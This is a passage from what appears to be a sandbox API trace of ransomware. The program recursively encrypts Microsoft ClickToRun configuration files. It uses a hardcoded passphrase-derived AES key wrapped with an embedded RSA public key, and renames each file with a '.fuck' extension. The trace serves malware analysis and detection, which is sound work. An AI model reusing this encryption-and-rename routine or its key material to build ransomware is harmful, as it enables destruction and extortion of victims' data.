hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a008*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x275a008*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0234.869] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a008, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0234.869] CloseHandle (hObject=0xffffffff) returned 1 [0234.869] CloseHandle (hObject=0xffffffff) returned 1 [0234.869] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), bFailIfExists=0) returned 0 [0234.869] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", dwFileAttributes=0x0) returned 0 [0234.870] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml.gsg")) returned 0 [0234.870] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml.fuck")) returned 0 [0234.870] CryptDestroyHash (hHash=0x394b28) returned 1 [0234.870] CryptDestroyKey (hKey=0x394be8) returned 1 [0234.870] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.870] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.870] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0234.870] GetLastError () returned 0x5 [0234.870] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml")) returned 0x20 [0234.872] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml", dwFileAttributes=0x80) returned 0 [0234.872] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.872] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.872] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.872] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2793100) returned 1 [0234.880] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0234.880] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.880] CryptHashData (hHash=0x394b28, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.880] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x394b28, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x394d28) returned 1 [0234.880] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.880] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0234.880] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2791cd0) returned 1 [0234.882] CryptImportPublicKeyInfo (in: hCryptProv=0x2791cd0, dwCertEncodingType=0x1, pInfo=0x2796e38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796e68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796e70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27176a8) returned 1 [0234.882] CryptEncrypt (in: hKey=0x27176a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0234.882] CryptEncrypt (in: hKey=0x27176a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27923b8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x27923b8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0234.882] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27923b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0234.882] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0234.882] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0234.882] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0234.882] CloseHandle (hObject=0xffffffff) returned 1 [0234.882] CloseHandle (hObject=0xffffffff) returned 1 [0234.883] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml"), bFailIfExists=0) returned 0 [0234.883] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml", dwFileAttributes=0x0) returned 0 [0234.883] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml.gsg")) returned 0 [0234.883] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml.fuck")) returned 0 [0234.883] CryptDestroyHash (hHash=0x394b28) returned 1 [0234.884] CryptDestroyKey (hKey=0x394d28) returned 1 [0234.884] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.884] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.884] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0234.884] GetLastError () returned 0x5 [0234.884] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml")) returned 0x20 [0234.884] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", dwFileAttributes=0x80) returned 0 [0234.884] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.884] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.885] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.885] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2793100) returned 1 [0234.894] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0234.895] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.895] CryptHashData (hHash=0x2716fa8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.895] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x2716fa8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x27170a8) returned 1 [0234.895] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.895] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0234.895] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2791890) returned 1 [0234.897] CryptImportPublicKeyInfo (in: hCryptProv=0x2791890, dwCertEncodingType=0x1, pInfo=0x27966e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796718*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796720*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27173a8) returned 1 [0234.897] CryptEncrypt (in: hKey=0x27173a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0234.898] CryptEncrypt (in: hKey=0x27173a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27926e8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x27926e8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0234.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27926e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0234.898] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0234.898] CryptEncrypt (in: hKey=0x27170a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0234.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0234.898] CloseHandle (hObject=0xffffffff) returned 1 [0234.898] CloseHandle (hObject=0xffffffff) returned 1 [0234.898] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), bFailIfExists=0) returned 0 [0234.898] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", dwFileAttributes=0x0) returned 0 [0234.899] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml.gsg")) returned 0 [0234.899] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml.fuck")) returned 0 [0234.899] CryptDestroyHash (hHash=0x2716fa8) returned 1 [0234.899] CryptDestroyKey (hKey=0x27170a8) returned 1 [0234.899] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.899] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.900] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27175e8 [0234.900] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.900] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.900] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2716fa8 [0234.900] FindNextFileA (in: hFindFile=0x2716fa8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.901] FindNextFileA (in: hFindFile=0x2716fa8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.901] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x27170a8 [0234.901] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0234.901] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0234.901] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x394b28 [0234.901] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0234.901] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0234.901] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x394be8 [0234.902] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0234.902] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0234.902] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0234.902] GetLastError () returned 0x5 [0234.902] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml")) returned 0x20 [0234.902] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml", dwFileAttributes=0x80) returned 0 [0234.903] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.903] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.903] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.903] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2793100) returned 1 [0234.913] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0234.913] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.913] CryptHashData (hHash=0x27ebaa0, pbData=0x279c418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.913] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x27ebaa0, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x27ebf20) returned 1 [0234.914] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.914] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0234.914] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2791de0) returned 1 [0234.917] CryptImportPublicKeyInfo (in: hCryptProv=0x2791de0, dwCertEncodingType=0x1, pInfo=0x2796888*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27968b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27968c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x27eb820) returned 1 [0234.917] CryptEncrypt (in: hKey=0x27eb820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0234.917] CryptEncrypt (in: hKey=0x27eb820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2791e68*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2791e68*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0234.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2791e68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.918] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9ce68*=0x0, lpOverlapped=0x0) returned 0 [0234.918] CryptEncrypt (in: hKey=0x27ebf20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x10) returned 1 [0234.918] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.918] CloseHandle (hObject=0xffffffff) returned 1 [0234.918] CloseHandle (hObject=0xffffffff) returned 1 [0234.918] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), bFailIfExists=0) returned 0 [0234.918] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml", dwFileAttributes=0x0) returned 0 [0234.919] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.gsg")) returned 0 [0234.919] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml.fuck")) returned 0 [0234.919] CryptDestroyHash (hHash=0x27ebaa0) returned 1 [0234.919] 